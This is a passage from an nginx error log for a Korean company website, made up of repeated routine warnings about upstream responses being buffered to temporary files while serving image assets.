"www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 06:08:50 [warn] 531#531: *7709 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000003005 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 08:47:14 [warn] 822#822: *12731 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/52/0000004525 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 08:47:14 [warn] 822#822: *12731 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/52/0000004526 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 08:47:14 [warn] 822#822: *12731 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/52/0000004527 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 09:46:09 [warn] 821#821: *14660 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/59/0000004592 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 09:46:09 [warn] 821#821: *14660 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/59/0000004593 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 09:49:40 [warn] 821#821: *14675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/59/0000004594 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 09:49:40 [warn] 821#821: *14675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/59/0000004595 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 09:49:40 [warn] 821#821: *14675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/59/0000004596 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 10:35:25 [warn] 822#822: *14801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/59/0000004598 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 10:35:25 [warn] 822#822: *14801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/59/0000004599 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 10:51:00 [warn] 822#822: *14829 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/60/0000004600 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 21:57:11 [warn] 844#844: *26949 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/28/0000006283 while reading upstream, client: 87.236.176.167, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr" -2026/02/15 22:48:13 [warn] 844#844: *27003 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/28/0000006284 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 22:48:13 [warn] 844#844: *27003 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/28/0000006285 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 22:48:14 [warn] 844#844: *27003 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/28/0000006286 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 22:51:16 [warn] 844#844: *27013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/28/0000006287 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 22:51:16 [warn] 844#844: *27013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/28/0000006288 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 22:51:16 [warn] 844#844: *27013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/28/0000006289 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 22:53:03 [warn] 842#842: *27026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/29/0000006290 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 22:53:03 [warn] 842#842: *27026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/29/0000006291 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:14:06 [warn] 845#845: *27056 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/29/0000006292 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:14:06 [warn] 845#845: *27056 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/29/0000006293 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:38:33 [warn] 845#845: *27091 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/29/0000006294 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:42:28 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/29/0000006295 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:42:28 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/29/0000006296 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:42:47 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/29/0000006297 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:42:47 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/29/0000006298 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:43:03 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/29/0000006299 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:43:20 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/30/0000006300 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:43:29 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/30/0000006301 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:49:46 [warn] 845#845: *27202 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/30/0000006302 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:49:46 [warn] 845#845: *27202 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/30/0000006303 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:57:24 [warn] 851#851: *27218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/30/0000006304 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:57:24 [warn] 851#851: *27218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/30/0000006305 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:58:35 [warn] 851#851: *27218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/30/0000006306 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 23:59:36 [warn] 851#851: *27218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/30/0000006307 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:06:27 [warn] 850#850: *27252 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/30/0000006308 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:06:49 [warn] 850#850: *27252 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/30/0000006309 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:06:49 [warn] 850#850: *27252 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/31/0000006310 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:16:24 [warn] 853#853: *27282 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/31/0000006311 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:22:22 [warn] 854#854: *27292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/31/0000006312 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:24:54 [warn] 854#854: *27292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/31/0000006313 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:25:16 [warn] 854#854: *27292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/31/0000006314 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:25:26 [warn] 854#854: *27292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/31/0000006315 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:44:43 [warn] 856#856: *27352 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/31/0000006316 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 00:44:43 [warn] 856#856: *27352 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/31/0000006317 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 02:13:56 [warn] 849#849: *28969 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000007061 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 02:13:56 [warn] 849#849: *28969 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/06/0000007062 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:17:53 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/82/0000007824 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:18:04 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/82/0000007825 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:18:04 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/82/0000007826 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:19:53 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/82/0000007827 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:19:53 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/82/0000007828 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:20:11 [warn] 854#854: *30729 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/82/0000007829 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:20:11 [warn] 854#854: *30729 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/83/0000007830 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:20:27 [warn] 854#854: *30729 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/83/0000007831 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:25:18 [warn] 855#855: *30748 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/83/0000007832 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:25:18 [warn] 855#855: *30748 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/83/0000007833 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:26:54 [warn] 855#855: *30748 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/83/0000007834 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:39:11 [warn] 855#855: *32284 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/57/0000008578 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:39:11 [warn] 855#855: *32284 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/57/0000008579 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:40:25 [warn] 855#855: *32284 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/58/0000008580 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:40:25 [warn] 855#855: *32284 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/58/0000008581 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:43:58 [warn] 855#855: *32316 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/58/0000008582 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:46:04 [warn] 855#855: *32327 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/58/0000008583 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:47:35 [warn] 855#855: *32338 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/58/0000008584 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:47:35 [warn] 855#855: *32338 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/58/0000008585 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:48:33 [warn] 855#855: *32338 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/58/0000008586 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: 